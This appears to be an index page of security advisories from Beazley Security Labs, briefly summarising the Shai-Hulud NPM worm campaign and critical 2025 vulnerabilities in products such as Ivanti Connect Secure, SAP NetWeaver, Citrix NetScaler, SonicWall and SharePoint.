Advisories
Malicious Worm Code Found in Many NPM Packages
Beazley Security Labs is monitoring a rapidly evolving supply-chain attack in the NPM (Node.js) ecosystem, known as the Shai-Hulud campaign. This attack uses a worm-like malicious payload embedded in compromised NPM packages. Once installed, the payload attempts to harvest secrets such as GitHub and NPM access tokens, as well as cloud credentials for Cloud providers such as AWS, Azure, and Google cloud platform. Once access tokens have been harvested, the worm then uses them to republish malicious versions of any packages the compromised tokens control. It also injects GitHub Actions workflows to enable ongoing data exfiltration and persistence, making this a self-propagating NPM worm that is continuously expanding it is reach and the ability to exfiltrate credentials from a broader set of victims.
Sep 17, 2025 - 5 Min Read
Critical Vulnerability in Ivanti Connect Secure (CVE-2025-55147)
On September 9th, Ivanti published an advisory detailing multiple security vulnerabilities found in their Connect Secure, Policy Secure, ZTA Gateway, and Neurons products. The advisory contains multiple vulnerabilities, the most critical of which is CVE-2025-55147. That vulnerability is a cross-site request forgery (CSRF) bug that allows an unauthenticated threat actor the ability to execute sensitive actions on behalf of a victim user. Successful exploitation requires user interaction from the victim.
Sep 9, 2025 - 2 Min Read
Critical Vulnerability in SAP Netweaver (CVE-2025-42944)
On September 9th, SAP released an advisory describing several vulnerabilities across multiple SAP platforms. Among these was CVE-2025-42944 (CVSS 10.0), which affects SAP NetWeaver Application Server. This vulnerability involves insecure deserialization and may permit unauthorized remote code execution on target systems.
Sep 9, 2025 - 2 Min Read
Critical Vulnerability in FreePBX (CVE-2025-57819)
On August 28th, open-source software organization FreePBX published an advisory detailing a critical vulnerability in their telephone software system FreePBX. Sangoma’s FreePBX security team reported active exploitation against systems that expose FreePBX administrative modules to the public internet. The vulnerability tracked as CVE-2025-57819, is a validation and sanitization bug in their “endpoint” module that could result in unauthenticated Remote Code Execution (RCE) on an affected FreePBX system.
Sep 2, 2025 - 2 Min Read
Critical 0-day Vulnerability in Citrix NetScaler Under Active Exploitation (CVE-2025-7775)
On August 26th, Citrix published an advisory detailing a critical vulnerability in their NetScaler line of products. Successful exploitation of this bug (tracked as CVE-2025-7775) grants an unauthenticated threat actor Remote Code Execution (RCE) on the device. These devices are typically deployed as internet facing by design, so this vulnerability can be used by threat actors to gain initial access to an organization’s internal network.
Aug 26, 2025 - 3 Min Read
Threat Actors Targeting Sonicwall Gen 7 and Newer Firewalls
On August 4th, SonicWall support published an advisory concerning an increase in threat activity targeting their Gen 7 Firewall product lineup, specifically with the SSLVPN component enabled.
Aug 5, 2025 - 7 Min Read
Critical Vulnerabilities in SonicWall SMA (CVE-2025-40596, CVE-2025-40597, CVE-2025-40598)
On July 23, 2025, SonicWall released three newly disclosed vulnerabilities in SonicWall’s Secure Mobile Access (SMA) 100 series devices: CVE-2025-40596, CVE-2025-40597, and CVE-2025-40598. The vulnerabilities, if successfully exploited, range from allowing unauthenticated attackers to perform Denial of Service (DoS) attack to executing arbitrary JavaScript code. The vulnerabilities were found and reported to SonicWall by a third-party cyber security firm, and SonicWall quickly released patches through normal update channels. Additionally, SonicWall has not confirmed active exploitation of vulnerabilities at the time of this writing. However, the reporting security firm has published proof-of-concept details and technical walkthroughs, increasing likelihood of active exploitation.
Jul 29, 2025 - 4 Min Read
Critical Vulnerability In CrushFTP Under Active Exploitation (CVE-2025-54309)
On July 18, 2025, CrushFTP confirmed active exploitation of a zero-day vulnerability impacting its secure file transfer platform. Identified as CVE‑2025‑54309, the flaw allows remote attackers to bypass authentication mechanisms and gain unauthorized access to vulnerable servers.
Jul 22, 2025 - 5 Min Read
SharePoint 0Day Vulnerability Under Active Exploitation (CVE-2025-53770)
Microsoft's SharePoint on-premise servers are vulnerable to an unauthorized Remote Code Exploit that is being actively exploited. CVE-2025-53770 dubbed "Toolshell" was found in the wild July 18th 2025 and requires immediate mitigation for those running on-premise SharePoint Servers.
Jul 21, 2025 - 6 Min Read
Critical Vulnerabilities in Citrix Netscaler Services and "CitrixBleed 2" (CVE-2025-6543, CVE-2025-5777)
Cloud Software Group, the holding company of Citrix, recently disclosed multiple critical vulnerabilities affecting Citrix NetScaler ADC and Gateway products, with the most severe being CVE-2025-6543 and CVE-2025-5777. These vulnerabilities allow unauthenticated attackers to perform memory overflow attacks.
Jun 25, 2025 - 5 Min Read